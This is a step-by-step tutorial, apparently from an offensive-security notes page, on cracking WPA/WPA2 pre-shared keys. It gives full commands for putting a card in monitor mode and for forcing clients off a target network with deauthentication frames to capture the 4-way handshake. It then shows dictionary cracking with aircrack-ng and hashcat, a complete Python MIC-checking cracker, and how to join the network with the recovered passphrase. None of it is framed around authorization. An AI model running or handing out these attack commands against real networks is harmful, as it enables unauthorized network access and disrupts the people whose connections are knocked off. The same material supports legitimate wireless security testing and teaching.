
# WPA & WPA2 PSK

## Cracking WPA/WPA2 with Handshake Capture

In this tutorial, we'll demonstrate how to recover the pre-shared key of a WPA/WPA2-PSK network by capturing the 4-way handshake and then running a dictionary attack against it with `aircrack-ng` or `hashcat`. The attack is offline: the handshake carries a MIC computed from the PSK, so every wordlist candidate can be tested without sending another frame to the network. It only succeeds if the passphrase is in your wordlist, and it does not apply to WPA-Enterprise (802.1X) networks, which have no shared passphrase to recover.

### Prerequisites

Ensure you have the following:

* A wireless card whose driver supports monitor mode and packet injection (injection is required for the deauthentication step).
* The necessary tools: `airmon-ng`, `airodump-ng`, `aireplay-ng`, `aircrack-ng` (all part of the aircrack-ng suite), `hashcat`, and `hcxpcapngtool` (from the hcxtools package) for the hashcat conversion.
* A wordlist (e.g., `/usr/share/wordlists/rockyou.txt`; on Kali it ships compressed as `rockyou.txt.gz` and must be extracted first).

### Step-by-Step Process

#### 1. **Start Interface in Monitor Mode and Kill Unwanted Services**

Start by stopping the processes that would interfere with the capture (NetworkManager, wpa_supplicant, dhclient) and putting your wireless interface into monitor mode. Both commands need root:

```bash
sudo airmon-ng check kill && sudo airmon-ng start wlan0
```

* `airmon-ng check kill`: Stops interfering processes. Expect to lose normal Wi-Fi connectivity on this host until you restart them.
* `airmon-ng start wlan0`: Puts the wireless interface `wlan0` into monitor mode. The monitor interface name is printed in the output; it is usually `wlan0mon`, which is what the rest of this page uses, but some drivers keep the original name.

#### 2. **Scan for Networks**

Next, scan for nearby wireless networks to identify the one you want to target:

```bash
sudo airodump-ng wlan0mon
```

Note the target's `BSSID`, `CH` and `ESSID` columns. `airodump-ng` hops channels by default, so this pass only needs to run long enough to see the AP and, ideally, at least one entry in the `STATION` list associated with it (you will need a connected client in step 4).

#### 3. **Scan on Specific AP and Channel with Output File**

Once you've identified the target AP, lock `airodump-ng` to its BSSID and channel and write the frames to disk:

```bash
sudo airodump-ng --bssid <BSSID> -c <Channel> -w <output_file> wlan0mon
```

* `--bssid <BSSID>`: The MAC address of the target AP (note the double dash; `-bssid` is not a valid option).
* `-c <Channel>`: The channel number on which the AP is operating. Fixing the channel stops `airodump-ng` from hopping, which is essential or it will miss handshake frames.
* `-w <output_file>`: A file-name prefix for the capture. `airodump-ng` appends a counter and extension, so the first capture is written as `<output_file>-01.cap` (with `.csv`, `.kismet.csv` and `.log.csv` side files).

Leave this running in its own terminal. When the handshake has been captured, the top-right corner of the screen shows `WPA handshake: <BSSID>`.

#### 4. **De-Authenticate Clients to Capture Handshake**

The 4-way handshake is only exchanged when a client (re)associates, so force one to reconnect by sending it deauthentication frames with `aireplay-ng` from a second terminal while `airodump-ng` keeps capturing:

```bash
# Omit -c to send broadcast deauths to every client of the AP
# (see the deauthentication section for that variant)
sudo aireplay-ng -0 0 -a <BSSID> -c <Client Mac> wlan0mon
```

* `-0 <count>`: Deauthentication attack mode with the number of deauth bursts to send. `0` sends them until you stop the command with Ctrl+C; it does not stop on its own when the handshake is captured. A small count such as `-0 5` is normally enough and keeps the client off the network for less time.
* `-a <BSSID>`: The BSSID of the target AP.
* `-c <Client Mac>`: The MAC address of a client currently connected to the AP (a `STATION` entry in the `airodump-ng` output). The client must reconnect on its own for the handshake to appear; if the network uses Protected Management Frames (802.11w), clients ignore forged deauths and you have to wait for a natural reconnect instead.

Check the `airodump-ng` window for `WPA handshake: <BSSID>` before stopping the capture.

#### 5. **Crack the WPA/WPA2 Key Using Aircrack-ng**

Once the handshake is captured, stop `airodump-ng` (Ctrl+C) and run `aircrack-ng` against the capture. Without a wordlist it cannot attack WPA at all, but it is a quick way to confirm that the file really contains a usable handshake for the target (look for `WPA (1 handshake)` next to the ESSID):

```bash
aircrack-ng <output_file>-01.cap -e <ESSID>
```

* `<output_file>-01.cap`: The capture file written by `airodump-ng` (note the `-01` suffix it adds).
* `-e <ESSID>`: The name (SSID) of the target network; `-b <BSSID>` selects by MAC address instead.

To actually recover the key, supply a wordlist. This is a dictionary attack, not a brute force: each candidate passphrase is expanded to a PMK with PBKDF2 (4096 rounds of HMAC-SHA1 salted with the SSID) and checked against the MIC in the captured handshake, so the key is found only if it is in the list:

```bash
aircrack-ng <output_file>-01.cap -e <ESSID> -w /usr/share/wordlists/rockyou.txt
```

#### 6. **Crack the WPA/WPA2 Key Using Hashcat**

Alternatively, use `hashcat`, which is far faster on a GPU. First, convert the capture to hashcat's WPA-PBKDF2-PMKID+EAPOL format (hash mode 22000) with `hcxpcapngtool` from the hcxtools package:

```bash
hcxpcapngtool -o <output_file>.hc22000 <output_file>-01.cap
```

* `<output_file>-01.cap`: The original capture file from `airodump-ng`.
* `<output_file>.hc22000`: The converted hash file. If the tool reports that no hashes were written, the capture does not contain a complete handshake (or PMKID) and you need to go back to step 4.

Next, run `hashcat` in mode 22000. The wordlist is a positional argument; do not pass it with `-w`, which in hashcat sets the workload profile (1-4) and will reject a file name:

```bash
hashcat -m 22000 <output_file>.hc22000 /usr/share/wordlists/rockyou.txt
```

Recovered keys are stored in hashcat's potfile; print them later with `hashcat -m 22000 <output_file>.hc22000 --show`.
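What both crackers do with each wordlist entry is the same computation, shown here as an added Python example (this is not code from this page, from aircrack-ng or from hashcat): derive the PMK from the candidate and the SSID, expand it to the PTK with the two MAC addresses and two nonces that are sent in the clear during the handshake, and recompute the MIC of EAPOL message 2 with the first 16 bytes of the PTK (the KCK). The SSID, MAC addresses, nonces, RSN IE, passphrase and wordlist below are constructed stand-ins for values a real `.cap` would contain; the script first builds the handshake the way a client would, then cracks it.

```python
"""Offline WPA2-PSK dictionary attack against a captured 4-way handshake.

Added illustration of the per-candidate check that aircrack-ng and
hashcat -m 22000 perform; not code from this page or from either tool.
All handshake material below is constructed so the script runs offline.
"""
import hashlib
import hmac
import struct


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (= PSK) = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    This is the expensive step and the reason WPA cracking is slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (384 bits for CCMP) from the PMK and the four public handshake values."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


# Offset of the 16-byte Key MIC in an EAPOL-Key frame: 802.1X header (4) + descriptor
# type (1) + key info (2) + key length (2) + replay counter (8) + nonce (32) + IV (16)
# + RSC (8) + ID (8) = 81.
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for descriptor version 2 (HMAC-SHA1-128, WPA2/CCMP): HMAC over the
    whole EAPOL frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, rsn_ie: bytes, replay_counter: int = 1) -> bytes:
    """EAPOL-Key message 2 of 4 (client -> AP) with the MIC field left zero."""
    body = (
        b"\x02"                            # descriptor type: RSN
        + struct.pack(">H", 0x010A)        # key info: version 2, pairwise, MIC bit set
        + struct.pack(">H", 0)             # key length (0 in message 2)
        + struct.pack(">Q", replay_counter)
        + snonce
        + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID (unused here)
        + bytes(16)                        # Key MIC placeholder
        + struct.pack(">H", len(rsn_ie))
        + rsn_ie                           # key data: the client's RSN IE
    )
    return b"\x02\x03" + struct.pack(">H", len(body)) + body  # 802.1X v2, EAPOL-Key


def crack(handshake: dict, wordlist: list):
    """Dictionary attack: return the candidate whose KCK reproduces the captured MIC."""
    captured_mic = handshake["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = derive_pmk(candidate, handshake["ssid"])
        kck = derive_ptk(pmk, handshake["ap_mac"], handshake["client_mac"],
                         handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), captured_mic):
            return candidate
    return None


# --- Constructed "capture": the values a real airodump-ng .cap would yield ---
SSID = "LabNet"
AP_MAC = bytes.fromhex("001122334455")      # constructed BSSID
CLIENT_MAC = bytes.fromhex("66778899aabb")  # constructed station MAC
ANONCE = bytes(range(32))                   # constructed nonces (real ones are random)
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK, CCMP


def make_handshake(passphrase: str) -> dict:
    """Act as the client: produce message 2 with a valid MIC for the given passphrase."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    frame = build_msg2(SNONCE, RSN_IE)
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return {"ssid": SSID, "ap_mac": AP_MAC, "client_mac": CLIENT_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": frame}


WORDLIST = ["password", "letmein", "Summer2024!", "correcthorse", "12345678"]  # constructed

if __name__ == "__main__":
    print(crack(make_handshake("Summer2024!"), WORDLIST))  # Summer2024!
    print(crack(make_handshake("not-in-list"), WORDLIST))  # None
```

Every candidate costs 4096 HMAC-SHA1 rounds in `derive_pmk`, which is why rockyou-sized lists take minutes on a CPU and why hashcat on a GPU is preferred. It also shows that only the SSID, the two MACs, the two nonces and the MIC'd EAPOL frame are needed, which is exactly what `hcxpcapngtool` extracts into a `.hc22000` line.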

#### 7. **Conclusion**

Once the passphrase is recovered you can join the network as an ordinary client. First take the card out of monitor mode with `sudo airmon-ng stop wlan0mon` (services stopped by `check kill` can be restarted afterwards, e.g. `systemctl start NetworkManager`), then write a configuration file from the ESSID and recovered passphrase with `wpa_passphrase "<ESSID>" "<passphrase>" > <filename>.conf` and hand it to `wpa_supplicant` on the managed interface:

```bash
sudo wpa_supplicant -B -i wlan0 -c <filename>.conf
```

* `-B`: Run in the background.
* `-i wlan0`: The managed (non-monitor) interface to associate with.
* `<filename>.conf`: The WPA configuration file containing the network details (`wpa_passphrase` writes the `ssid` and the PBKDF2-derived `psk`; delete the file when you are done, since it also keeps the plaintext passphrase in a comment).

Request an IP address from the DHCP server:

```bash
sudo dhclient -v wlan0
```

By following these steps you'll have recovered the WPA/WPA2 pre-shared key and joined the network with it.

